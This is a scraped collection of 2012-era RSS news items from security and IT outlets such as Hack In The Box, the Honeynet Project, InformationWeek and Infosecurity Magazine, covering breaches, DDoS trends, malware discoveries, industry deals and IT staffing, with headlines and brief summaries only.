http://www.hackinthebox.org/backend.php http://en.wikipedia.org/wiki/Clearwire Sprint Nextel has secured control of Clearwire, the wireless network operator that holds valuable spectrum, according to a regulatory filing on Thursday. The filing shows that Sprint agreed on Wednesday to acquire the interests in Clearwire held by Craig O. McCaws Eagle River Holdings. The transfer of Class A shares and Class B interests gives Sprint a majority stake of 50.8 percent of Clearwire. Tags: Industry News

==> 1080p on a smartphone screen—can it possibly matter?

http://www.hackinthebox.org/backend.php http://cdn.arstechnica.net/wp-content/uploads/2012/10/6931914496_588c6f8dbb_z.jpg Its no secret that phone displays are getting bigmuch bigger than they used to be. The iPhone got bumped up a notch (from 3.5 inches to 4 inches), Nokias Lumia display is gargantuan (4.3 inches), and some of the Android phones launching this quarter come with 4.7-inch displays. Tags: HardwareTechnology

==> Pirate Bay Moves to The Cloud, Becomes Raid-Proof

http://www.hackinthebox.org/backend.php http://en.wikipedia.org/wiki/The_Pirate_Bay The Pirate Bay has made an important change to its infrastructure. The worlds most famous BitTorrent site has switched its entire operation to the cloud. From now on The Pirate Bay will serve its users from several cloud hosting providers scattered around the world. The move will cut costs, ensure better uptime, and make the site virtually invulnerable to police raids all while keeping user data secure. The Pirate Bay is loved by millions of file-sharers but is also a thorn in the side of the entertainment industries. Tags: Industry NewsPiratebay

==> #HITB2021KUL: An eco-system of disruptions and dependencies

http://www.hackinthebox.org/backend.php http://www.digitalnewsasia.com/sites/default/files/images/digital%20economy/Mikko%20Chopped.JPG THE Hack In The Box Security Conference in Kuala Lumpur (HITBSecConf2012 or HITB2012KUL) that ran from Oct 10-11 was a fitting monument to the series 10th anniversary. Tags: HITBHITB2012KULIndustry News

==> Don't secure the internet, it needs crime: Whitfield Diffie

http://www.hackinthebox.org/backend.php http://www.flickr.com/photos/lassi_kurkijarvi/3456993824/ While many people see securing the internet as a means to stopping cybercrime, former vice president for information security and cryptography at the Internet Corporation for Assigned Names and Numbers (ICANN) Whitfield Diffie thinks that internet crime may be necessary. Diffie, who spoke at the Australian Information Security Association's National Conference 2012 in Sydney this week, is better known for his contribution to the cryptography community by devising with Martin Hellman and Ralph Merkle the Diffie-Hellman public key exchange method. Tags: Security

==> Security flaw found in Steam

http://www.hackinthebox.org/backend.php http://limages.vr-zone.net/body/17477/steam_0.jpg.jpeg Hackers could have a new means of accessing your computer through a browser command which utilizes Valve's software distribution system Steam. When your browser accesses a URL that begins with the command "steam://", it will prompt your copy of steam to launch and perform some operation. Usually, such an operation would be to launch a game, or install or uninstall software. Tags: SecurityGames

==> Pacemaker hacker says worm could possibly 'commit mass murder'

http://www.hackinthebox.org/backend.php http://blogs.computerworld.com/sites/computerworld.com/files/u185/embedded_implanted_pacemaker.png It seems like something is very wrong with the picture when you read the news and it sounds more like a science fiction novel than a newsflash. For example, Barnaby Jack showed how an attacker with a laptop, located up to 50 feet from a victim, could remotely hack a pacemaker and deliver an 830-volt shock. Tags: SecurityScience

==> Over 20Gbps DDoS attacks have become common occurrences

http://www.hackinthebox.org/backend.php http://en.wikipedia.org/ Distributed denial-of-service (DDoS) attacks with an average bandwidth of over 20Gbps have become commonplace this year, according to researchers from from DDoS mitigation vendor Prolexic. Last year such high-bandwidth attacks were isolated incidents, but attacks that exceed 20Gbps in bandwidth occur frequently now, Prolexic's president Stuart Scholly said Tuesday. Tags: NetworkingSecurity

==> Fortinet, Check Point Dive After Weaker Than Expected Earnings

http://www.hackinthebox.org/backend.php http://en.wikipedia.org/wiki/Fortinet Fortinet (FTNT) stock plunged nearly 18% early Wednesday after issuing weaker than expected earnings guidance late Tuesday. Fellow networking security vendor Check Point Software Technologies (CHKP) also posted a double-digit intraday loss after its own weak forecast Wednesday. Security stocks had wavered ahead of third-quarter earnings season, with economic issues and slow PC sales leaving investors a little skittish. Tags: Industry News

==> A lesser-known new feature in iOS 6: It's tracking you everywhere

http://www.hackinthebox.org/backend.php http://www.flickr.com/photos/l33tdawg/8039255132/in/photostream L33tdawg: We already covered this and the steps needed to turn it off in Want Better Battery Life in iOS 6? Turn off tracking! Apple has enabled user tracking of its customers once again, with the recently released iOS 6 enabling advertisers to see which apps users have run, and which adverts they've seen all for the benefit of the users, of course. Tags: ApplePrivacySecurityiOS

==> Facebook partners with Panda Security

http://www.hackinthebox.org/backend.php http://en.wikipedia.org/wiki/Facebook Panda Security signed a collaboration agreement with Facebook to protect users. Facebook users will be able to download a free 6-month version of Panda Internet Security 2013 from the AV Marketplace. Additionally, both companies will share their databases of malicious URLs to protect users while surfing the Web. Tags: FacebookPandaSecurity

==> Zero-day attacks last much longer than most would believe

http://www.hackinthebox.org/backend.php http://cdn.arstechnica.net/wp-content/uploads/2012/10/0day-illustration-640x359.jpg A new report shows that zero-day attacks are more prevalent than previously thought and persist longer than expected before being detected in some cases for more than 300 days. Security firm Symantec published the findings, which showed that the typical zero-day attack, an exploit for a vulnerability for which there is no patch available, lasted about 10 months on average before being discovered. Tags: Security

==> Adobe Reader and Acrobat get another layer of security

http://www.hackinthebox.org/backend.php http://en.wikipedia.org/wiki/Adobe_Systems Adobe announced new security features this week for its Reader and Acrobat XI products, including enhanced sandboxing, Force ASLR, PDF whitelisting, and Elliptic Curve Cryptography. In addition to a number of new features enhancing Reader's and Acrobat's PDF-creation capabilities, these security measures add another layer atop previous changes that have improved a once "widely exploited" app over the past two years. Tags: AdobeSecurity

==> MasterCard Is Selling Your Data Just in Time for the Holidays

http://www.hackinthebox.org/backend.php http://www.wired.com/images_blogs/business/2012/10/mastercard-660x440.jpeg Credit card companies make money by taking a cut every time you swipe your plastic at the checkout counter. Now MasterCard has found a way to make those swipes pay over and over again. As the Financial Times first reported, MasterCard is packaging its transaction data your transaction data and selling it to advertisers. The story was based on an apparently confidential pitch MasterCard made to potential clients. Not too confidential, because we found a copy by googling it. Tags: Privacy

==> HP Annual Report 2012 released

http://www.honeynet.org/rss.xml Each year, the Honeynet Project summarizes its activities and activities of its members in a short annual report. You will find the annual report for fiscal year 2012 attached. Enjoy!

==> Honeynet Project completes Cyber Fast Track Project: Web Application Honeypots

http://www.honeynet.org/rss.xml We are happy to be able to announce the successful completion of The Honeynet Project's participation in DARPA's Cyber Fast Track program with our Web Application Honeypot project. Imperva's recent Web Application Attack Report shows the picture of large scale automated threats towards web applications. Adversaries are basically scanning millions of web applications for vulnerabilities every day and a single successful infection increases their army of workers and thereby their capability for doing more damage. Without a specific target, attackers can leverage automated tools and search engines excellent information aggregation service to find their victims, identify the vulnerability, and launch an attack. The majority of web application attacks target the web application's database. These - so called SQL injection attacks - manipulate the underlying database by providing user input that - due to the vulnerability in the web application - is converted into SQL statements. The main goal of this project was the development of a SQL injection vulnerability emulator that goes beyond the collection of SQL vulnerability probings. It deceives the adversary with crafted responses matching his request into sending us the malicious payload which could include all kinds of malicious code. The project is being released as open-source and installation instructions can be found on the project page. A detailed report was created as part of the project.

==> Know Your Enemy: Social Dynamics of Hacking

http://www.honeynet.org/rss.xml I am very pleased to announce the publication of another paper in our Know Your Enemy white paper series: "KYE - Social Dynamics of Hacking" authored by Thomas J. Holt and Max Kilger from our Spartan Devils Honeynet Project Chapter. In this paper, Tom and Max go to the roots of the Know Your Enemy series and shine light on the social groups that are involved in hacking. Abstract Though most information security research focuses on current threats, tools, and techniques to defeat attacks, it is vital to recognize and understand the humans behind attacks. Individual attackers have various skills, motives, and social relationships that shape their actions and the resources they target. In this paper we will explore the distribution of skill in the global hacker community, the influence of on and off-line social relationships, motivations across attackers, and the near-future of threats to improve our understanding of the hacker and attacker community.

==> GSoC 2012 Accepted Students Officially Announced

http://www.honeynet.org/rss.xml Since my last post about the Google Summer Of Code 2012 Student Applications deadline closing and sharing some initial student applications statistics, all the GSoC 2012 mentoring organisations have been hard at work reviewing and scoring their student applications.

==> Google Summer Of Code 2012 Student Applications now closed and some statistics

http://www.honeynet.org/rss.xml After a slower than usual start, this years Google Summer of Code (GSoC) student applications period closed at 19:00 UTC on Friday April 6th, with a major application rush in the last couple of days which kept us busy right up to the deadline! Many thanks to all the interested students who applied, and our mentors and org admins for taking the time to respond to students on IRC, email and through Melange.

==> Honeynet Project Security Workshop 2012 - VIDEOs posted

http://www.honeynet.org/rss.xml Folks, we had a great time at the Honeynet Project Security Workshop @ Facebook. We'd like to thank again our execellent hosts Facebook, the attendees, and our many speakers. If you were not able to attend, you can check out the videos at http://honeynet.org/SecurityWorkshops/2012_SF_Bay_Area/Mar_19/Workshop_Program_Agenda.

==> Google Summer Of Code 2012 Student Applications - Deadline Approaching

http://www.honeynet.org/rss.xml If you have been following our blog you'll know that the Honeynet Project was very happy to have been accepted as a mentoring organization for Google Summer of Code (GSoC) 2012. If you are a student interested in applying to the Honeynet Project, the student application deadline is 19:00 UTC on Friday April 6th. So with 3 days to go, you need to be planning on submitting your project application vi the Melange system soon. To avoid disappointment, please don't leave your application until the last minute - you can edit as often as you want before the deadline.

==> Google Soc 2012 - Honeynet Project Accepted

http://www.honeynet.org/rss.xml We have just been notified by Google that the Honeynet Project has - once again - been accepted as one of the mentoring organization for Google Summer of Code 2012 (in total 180 organizations were selected). We are very excited and are looking forward to a great summer! Already a big thank you to Google for their continued support! While student applications are not officially open yet, interested students are encouraged to check out our ideas page and get in contact with us via gsoc@public.honeynet.org and/or IRC (#gsoc2012-honeynet on irc.freenode.net) in the next few ideas to meet the mentors and discuss project ideas. Student applications officially open on March 26th 2012 and close on April 6th 2012. We are looking forward to hearing from you!

==> Google Summer of Code 2012 - Organization Application submitted

http://www.honeynet.org/rss.xml Last Friday was the deadline for GSoC 2012 Mentoring Organization Applications. After three successful participations in the Google Summer of Code program in 2009, 2010, and 2011, we - once again - applied to be part of GSoC again this year. Our experience with the program has been tremendous. We have been able to excite students worldwide (many which have gone on to become members of the Honeynet Project) for open-source development in the information security space and several of the leading honeynet open-source tools started with a GSoC project. We are looking forward to get students involved with our expert mentors again this year to tackle the many research and development problems still remaining in information security. While we patiently await Google's response to our application (the list of list of officially accepted GSoC 2012 orgs is announced on March 16th 23:00 UTC, we urge you to check out our project ideas page for some suggestions of the type of projects we would like to mentor (although students can also suggest their own ideas too). You can start getting in contact with us on IRC and email to discuss potential project ideas (some of you are already are doing so, which is great). You can reach us at #gsoc2012-honeynet on irc.freenode.net as well as by joining our public GSoC ideas mailing list. We hope to hear from you! A big thanks to Google for their continued support for FOSS. We hope we will be accepted to participate as a GSoC mentoring organization again this year and we are all looking forward to a productive and exciting GSoC 2012!

==> Release of WoLF Viz

http://www.honeynet.org/rss.xml Frasier, who participated in our recent visualization forensic challenge has released his visualization tool WoLF Viz at http://code.google.com/p/wolf-viz/. WoLF Viz works by parsing arbitrary text log files into a network (graph) of words, where the words are nodes and the edges are adjacent word pairs. The edge weights are based on how often the two words are seen next to each other.

==> Why GM's Hiring 3,000 IT Pros From HP

http://www.informationweek.com/rss/management.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN Move answers a key question that had been hanging over GM CIO Randy's Mott's strategy.

==> Kontiki: A New Approach To Enterprise Content Delivery

http://www.informationweek.com/rss/management.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN Startup offers video-based solutions for employee training, communication, and more. Watch our Valley View elevator pitch session with Kontiki's CEO.

==> Big Data Drives Big IT Spending

http://www.informationweek.com/rss/management.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN IT spending will hit $34 billion by 2013 as companies upgrade and adapt existing infrastructures to meet the demands of big data, Gartner research predicts.

==> IBM Sales Off Sharply In Third Quarter

http://www.informationweek.com/rss/management.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN Big Blue sees revenue decline in key areas as sales fail to meet analysts' expectations.

==> How One Midsize Bank Protects Against Hacks

http://www.informationweek.com/rss/management.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN In light of ongoing hacktivist attacks on major banks, Lake Trust Credit Union information security pro shares insights on how a smaller bank stays secure without too-big-to-fail resources.

==> Enterprise Hunger For Custom Apps Equals Developer Jobs

http://www.informationweek.com/rss/management.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN IT job hunters, it's a good time to be an application developer. Thanks in part to BYOD, the demand for custom enterprise apps is booming.

==> Should High Schools Teach Big Data?

http://www.informationweek.com/rss/management.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN Given the anticipated shortage of data scientists, some high school educators have jumped in to expose students to big data concepts.

==> How To Close The IT Skills Gap

http://www.informationweek.com/rss/management.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN Year Up director to discuss program that teaches tech skills to Bay Area students and helps them get industry jobs at E2 Innovate conference.

==> InformationWeek's RSS Feed is brought to you by

http://www.informationweek.com/rss/management.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN

==> Consumers Pushing Banks To Internet Scale: Financial CTO

http://www.informationweek.com/rss/management.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN Yobie Benjamin, global CTO for a large financial institution, recently joined David Berlind and Fritz Nelson on the set of InformationWeek's Valley View to discuss his top priorities.

==> CIO Profiles: Richard Thomas Of Quintiles

http://www.informationweek.com/rss/management.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN This CIO is strongly in favor of the bring-your-own-device trend.

==> GM To Hire 1,500 IT Pros In Michigan

http://www.informationweek.com/rss/management.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN IT development center in Warren is the latest location in General Motors' plan to ramp up staff and reduce its use of outsourcing.

==> Why Business Doesn't Look To IT For Innovation

http://www.informationweek.com/rss/management.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN Most employees outside of IT don’t call their IT teams very innovative, yet most believe technology is growing in importance, our research shows. Can IT still be the hero?

==> Apple After Jobs: Cook's Real Challenge

http://www.informationweek.com/rss/management.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN A year after the death of its charismatic leader, Apple is thriving. But CEO Tim Cook's success may depend on content services--not finding another iPad.

==> Carriers Team Up To Protect LTE Patents

http://www.informationweek.com/rss/management.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN Despite skepticism about the effectiveness of patent pools, AT&T, Clearwire, Telefonica, and seven others join forces to protect 4G intellectual property.

==> 8 IT Mistakes: Must-Have Lessons From Top CIOs

http://www.informationweek.com/rss/management.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN Spare the euphemisms. Great teams embrace mistakes and get better.

==> CIO Profile: Darko Dejanovic Of Active Network

http://www.informationweek.com/rss/management.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN Miscommunication can really wreck an IT project, says this tech chief.

==> IT Staff Shortages May Short Circuit Meaningful Use

http://www.informationweek.com/rss/management.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN Health IT staff retention is a growing concern for healthcare CIOs, even as they have trouble filling existing openings, reports College of Healthcare Information Management Executives poll.

==> Data Scientist Jobs Hiding Under Less Sexy Titles

http://www.informationweek.com/rss/management.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN Big data's hottest job title, data scientist, remains rare in online postings. Job seekers can use other keywords to find 'hidden' big data jobs.

==> Valley View Goes Deep With NetSuite

http://www.informationweek.com/rss/management.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN Watch the full video of the September episode of InformationWeek's Valley View, including the Elevator Pitch segment on emerging technology companies.

==> Former Goldman Programmer Faces New Charges

http://www.informationweek.com/rss/management.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN Sergey Aleynikov charged with stealing highly confidential software that powers high-frequency trading systems.

==> Big Data Squeezes Legacy IT Spending: IDC

http://www.informationweek.com/rss/management.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN Along with cloud computing, mobile, and social networking, big data will account for a growing percentage of IT spending, leaving little to maintain older systems, says IDC study.

==> InformationWeek's RSS Feed is brought to you by

http://www.informationweek.com/rss/management.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN

==> Foxconn Factory Riot Blamed On iPhone 5 Rush

http://www.informationweek.com/rss/management.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN Workers' advocates say Apple's shiny new gadget is being produced in unsafe conditions, sparking tensions between offshore assembly crews and guards.

==> iPhone 5 Maker Shuts Plant Amid Labor Strife

http://www.informationweek.com/rss/management.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN Apple and contractor Foxconn are mum on whether facility's closure will impact production of iPhone 5, which is sold out across the country.

==> CIO Profiles: Mark White Of Swank Audio Visuals

http://www.informationweek.com/rss/management.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN Ignore hyped technologies at you own risk, says this CIO.

==> Silent Circle's Military-Grade Encryption: BYOD Tool?

http://www.informationweek.com/rss/security.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN Silent Circle's encryption tools for smartphones and tablets are a boon for privacy enthusiasts--but enterprises could find them useful too. Email this Article Add to Twitter Add to Facebook Add to Slashdot Add to digg

==> InformationWeek's RSS Feed is brought to you by

http://www.informationweek.com/rss/security.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN

==> VA Computers Remain Unencrypted, Years After Breach

http://www.informationweek.com/rss/security.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN Report faults IT managers for 6-year delay in adopting security measures. Email this Article Add to Twitter Add to Facebook Add to Slashdot Add to digg

==> After Benghazi, State Dept. Seeks Diplomat Tracking Technologies

http://www.informationweek.com/rss/security.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN Following deadly attacks on diplomatic facilities in Libya, the Department of State wants new technology to track employees working in the field. Email this Article Add to Twitter Add to Facebook Add to Slashdot Add to digg

==> IBM Security Tools Add Hadoop Monitoring

http://www.informationweek.com/rss/security.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN A Hadoop intelligence tool stands out as IBM updates its security portfolio to address security issues related to big data, analytics, cloud computing, mainframes, and mobile devices. Email this Article Add to Twitter Add to Facebook Add to Slashdot Add to digg

==> Election 2012: Could Hackers Change Results?

http://www.informationweek.com/rss/security.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN Many of the same vulnerabilities exist in electronic voting systems as did the last time we elected a U.S. president. New threats could put voter databases at risk and undermine civic confidence. Email this Article Add to Twitter Add to Facebook Add to Slashdot Add to digg

==> Crowdstrike Puts APT Attackers On Notice

http://www.informationweek.com/rss/security.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN Much-watched startup takes an offensive, not defensive, approach to enterprise security. Learn more in this video from Valley View. Email this Article Add to Twitter Add to Facebook Add to Slashdot Add to digg

==> Google Helps Webmasters Disavow Spammy Links

http://www.informationweek.com/rss/security.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN New Disavow tool gives website owners a way to distance their sites from linkspam. Email this Article Add to Twitter Add to Facebook Add to Slashdot Add to digg

==> Huawei, ZTE: 4 Security Fears

http://www.informationweek.com/rss/security.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN Trojan equipment? Spy tool? Sloppy code? The information security debate rages on over these Chinese telecom equipment makers. Email this Article Add to Twitter Add to Facebook Add to Slashdot Add to digg

==> 7 MiniFlame Facts: How Much Espionage Malware Lurks?

http://www.informationweek.com/rss/security.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN Discovery of Flame and MiniFlame revealed a cyber-espionage operation targeting Lebanon. But many similar threats have yet to surface, say security experts. Email this Article Add to Twitter Add to Facebook Add to Slashdot Add to digg

==> InformationWeek's RSS Feed is brought to you by

http://www.informationweek.com/rss/security.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN

==> What Huawei, ZTE Must Do To Regain Trust

http://www.informationweek.com/rss/security.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN The U.S. is not the only country scrutinizing the security of Chinese-made telecom equipment from Huawei and ZTE. Without major changes, significant contracts are at risk. Email this Article Add to Twitter Add to Facebook Add to Slashdot Add to digg

==> How One Midsize Bank Protects Against Hacks

http://www.informationweek.com/rss/security.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN In light of ongoing hacktivist attacks on major banks, Lake Trust Credit Union information security pro shares insights on how a smaller bank stays secure without too-big-to-fail resources. Email this Article Add to Twitter Add to Facebook Add to Slashdot Add to digg

==> Seagate Seeks Enterprise HDD Comeback

http://www.informationweek.com/rss/security.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN Seagate tries to recapture its lead from Western Digital, debuts three new hard disk drives with enterprise-class performance and security. Email this Article Add to Twitter Add to Facebook Add to Slashdot Add to digg

==> Hackers Rob $400,000 From Washington Town

http://www.informationweek.com/rss/security.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN Small Washington State town lost funds from its own Bank of America account, as well as employees' and residents' bank account information. Email this Article Add to Twitter Add to Facebook Add to Slashdot Add to digg

==> Meet Flame Espionage Malware Cousin: MiniFlame

http://www.informationweek.com/rss/security.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN Suspected Flame module turns out to be standalone attack code in use since at least 2010, described as targeted cyberweapon for conducting in-depth surveillance and espionage. Email this Article Add to Twitter Add to Facebook Add to Slashdot Add to digg

==> Bank Hacks: Iran Blame Game Intensifies

http://www.informationweek.com/rss/security.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN Wells Fargo official says scale of the attacks was "pretty significant." Is this the face of "cyberwar"? Email this Article Add to Twitter Add to Facebook Add to Slashdot Add to digg

==> Should You Buy From Huawei?

http://www.informationweek.com/rss/security.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN Congress says U.S. companies should not purchase products from Chinese firms Huawei and ZTE, citing national security concerns. I say Congress is dealing more in fear than facts. Email this Article Add to Twitter Add to Facebook Add to Slashdot Add to digg

==> LulzSec Attacker Pleads Guilty To Sony Pictures Hack

http://www.informationweek.com/rss/security.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN Defendant agrees to pay restitution toward Sony's $600,000 data breach cleanup costs. Email this Article Add to Twitter Add to Facebook Add to Slashdot Add to digg

==> InformationWeek's RSS Feed is brought to you by

http://www.informationweek.com/rss/security.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN

==> 6 Reasons iOS 6 Jailbreaks Will Be Tough

http://www.informationweek.com/rss/security.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN Glory hounds hoping to jailbreak Apple's newest devices won't have an easy time of it. Security experts detail the challenges. Email this Article Add to Twitter Add to Facebook Add to Slashdot Add to digg

==> DOD: Hackers Breached U.S. Critical Infrastructure Control Systems

http://www.informationweek.com/rss/security.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN Defense secretary Leon Panetta says cyberattacks against critical infrastructure at home and abroad--some of which he called the worst to date--should spark urgent action against the hacker threat. Email this Article Add to Twitter Add to Facebook Add to Slashdot Add to digg

==> U.S. Bank Hacks Expand; Regions Financial Hit

http://www.informationweek.com/rss/security.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN Attacks by self-described Muslim hackers, now in their fourth week, hit Regions Financial Thursday. Hacking campaign has also disrupted Capital One and SunTrust banking websites. Email this Article Add to Twitter Add to Facebook Add to Slashdot Add to digg

==> iOS6 Ad Tracking: How To Opt Out

http://www.informationweek.com/rss/security.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN By default, iOS 6 tracks iPhone and iPad owners' browsing history to serve advertisements. Email this Article Add to Twitter Add to Facebook Add to Slashdot Add to digg

==> Bromium Strengthens Desktop Security Using Virtualization

http://www.informationweek.com/rss/security.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN Ex-Citrix CTO Simon Crosby says Bromium's vSentry technology isolates suspicious activity in a virtual machine, then identifies and flushes it when the VM is erased. Email this Article Add to Twitter Add to Facebook Add to Slashdot Add to digg

==> Hackers Launch New Wave Of U.S. Bank Attacks

http://www.informationweek.com/rss/security.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN Hacker group disrupts Capital One, SunTrust websites, compares its campaign against anti-Muslim movie to Kate Middleton's suit against a French magazine. Email this Article Add to Twitter Add to Facebook Add to Slashdot Add to digg

==> RIM CIO Talks Enterprise BYOD

http://www.informationweek.com/rss/security.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN CIO Robin Bienfait talks about RIM's enterprise-friendly features like BlackBerry Balance, security and apps, and welcoming iOS and Android devices into the mix. Email this Article Add to Twitter Add to Facebook Add to Slashdot Add to digg

==> InformationWeek's RSS Feed is brought to you by

http://www.informationweek.com/rss/security.xml;jsessionid=CCQERUBPXHVDCQSNDLRCKHSCJUNN2JVN

==> Passwords: young people are lax, rich people are careful

http://www.infosecurity-magazine.com/rss/news/ A new survey on password attitudes shows a difference between age groups, income, marital status and more providing intriguing data that might be as valuable to the sociologist as to the security industry.

==> Twitter blocks neo-Nazi group account in Germany

http://www.infosecurity-magazine.com/rss/news/ Using its new ability to filter accounts on a geographic basis, Twitter is filtering out tweets of a German neo-Nazi group in Germany.

==> William Hague uses visit to Bletchley to announce spy apprenticeships

http://www.infosecurity-magazine.com/rss/news/ On Thursday, UK Foreign Secretary William Hague visited Churchills wartime golden goose, Bletchley Park, the UKs spiritual home of cryptography. He announced a 480,000 grant to preserve the past, and 100 GCHQ apprenticeships to secure the future.

==> Pacemaker virus could lead to "mass murder"

http://www.infosecurity-magazine.com/rss/news/ Hackers now have a new attack vector, but one with much more serious consequences than data theft or financial ruin: pacemakers and implantable cardioverter-defibrillators (ICDs).

==> ISF launches multi-organization standards initiative to tackle supply-chain security

http://www.infosecurity-magazine.com/rss/news/ Following calls for closer collaboration within the cybersecurity industry, the Information Security Forum (ISF) has kicked off a new global partnership initiative to bring together industry associations, international standards bodies and government agencies from across the landscape to create a standards framework covering supply-chain security.

==> Apple loses the latest battle in its war against Samsung

http://www.infosecurity-magazine.com/rss/news/ In the continuing worldwide battle between Apple and Samsung over smartphone and tablet design and patents, Samsung has emerged victorious in the latest round fought out in the courts of London.

==> IBM makes ten integrated product announcements – stakes claim on holistic security

http://www.infosecurity-magazine.com/rss/news/ Today IBM announces ten different enhancements or new products in its security stable. This is a major development by any standard. However, what lies behind this announcement may well have a more profound and long term effect on the future of security in general and cloud security in particular, than the announcements themselves.

==> The DDoS threat continues to increase – 20 Gbps no longer uncommon

http://www.infosecurity-magazine.com/rss/news/ In Q3 2012 the average size of a DDoS attack increased by around 11% to 4.4 Gbps, the average duration rose slightly from 17 to 19 hours, and the total number of attacks declined by 14%.

==> Top 5 UK SMS spam campaigns are finance-related

http://www.infosecurity-magazine.com/rss/news/ When it comes to mobile spam, some campaigns are destined for the Hall of Fame, thanks to how widespread theyve become. Taking a look at the contenders, mobile security firm AdaptiveMobile has ranked the top five SMS spam campaigns that have plagued UK mobile phone users in 2012and they all revolve around finances.

==> Australia mulls data breach-notification laws

http://www.infosecurity-magazine.com/rss/news/ The Australian Attorney-General's Department is mulling whether or not to introduce mandatory data breach-notification laws. The AG is accepting public comments on the issue ahead of making a decision.

==> Multi-device, multi-vendor IT security departments lack automation, grow risk

http://www.infosecurity-magazine.com/rss/news/ Unsurprisingly, complexity in network security environments, particularly multi-vendor environments, yields risk, according to a new survey. And yet, manual processes and a lack of consolidation across operations is still the norm even as IT departments add more and more vendors, devices and firewall rules. This creates a gap between the capacity of the IT staff to manage systems and the rate of their proliferation.

==> Oracle's critical patch update includes 'game-over' vulnerabilities

http://www.infosecurity-magazine.com/rss/news/ Oracle has issued a large Critical Patch Update (CPU), which contains 109 new security vulnerability fixes across hundreds of Oracle products, including Oracle Database, WebLogic server, PeopleSoft, Siebel, MySQL and VM Virtual Box. While all are in need of immediate attention, some vulnerabilities pose a greater risk than others, researchers warn.

==> (ISC)² creates McNulty award to honor a government security pioneer, names GISLA winners

http://www.infosecurity-magazine.com/rss/news/ Although the federal government is not known for moving quickly in terms of cyber-security, there are some leading lights illuminating the path forward to advanced threat preparedness. In recognition, (ISC) has announced the recipients of its ninth annual U.S. Government Information Security Leadership Awards (GISLA) program, across five categories. And, it has unveiled a new award, to be given out in October 2013, named in honor of Lynn F. McNulty, CISSP, who passed away in June 2012 and whose innovation, influence and commitment to government information security is considered to be a milestone in the industry.

==> Facebook Improves Security Ahead of UK Government Initiative

http://www.infosecurity-magazine.com/rss/news/ Prime Ministers and companies with falling share values have one thing in common they both need friends. Mutual co-operation is the obvious next step; and that seems to be happening between the UK government and Facebook.

==> AnonUKIre resurrect #OpTrialAtHome in protest of O'Dwyer extradition

http://www.infosecurity-magazine.com/rss/news/ Yesterday home secretary Theresa May blocked the extradition of hacker Gary McKinnon to the US; but the fate of Richard ODwyer remains in the balance. Today, AnonUKIre will announce the continuation of #OpTrialAtHome in defense of ODwyer this time against the originators of the extradition laws.

==> Shining a light on zero-day attacks

http://www.infosecurity-magazine.com/rss/news/ A new study by Symantec researchers seeks a better understanding of zero-day attacks and finds them more, prevalent, longer-lasting and more dangerous than hitherto realised.

==> ISO releases cyberspace-focused security standard

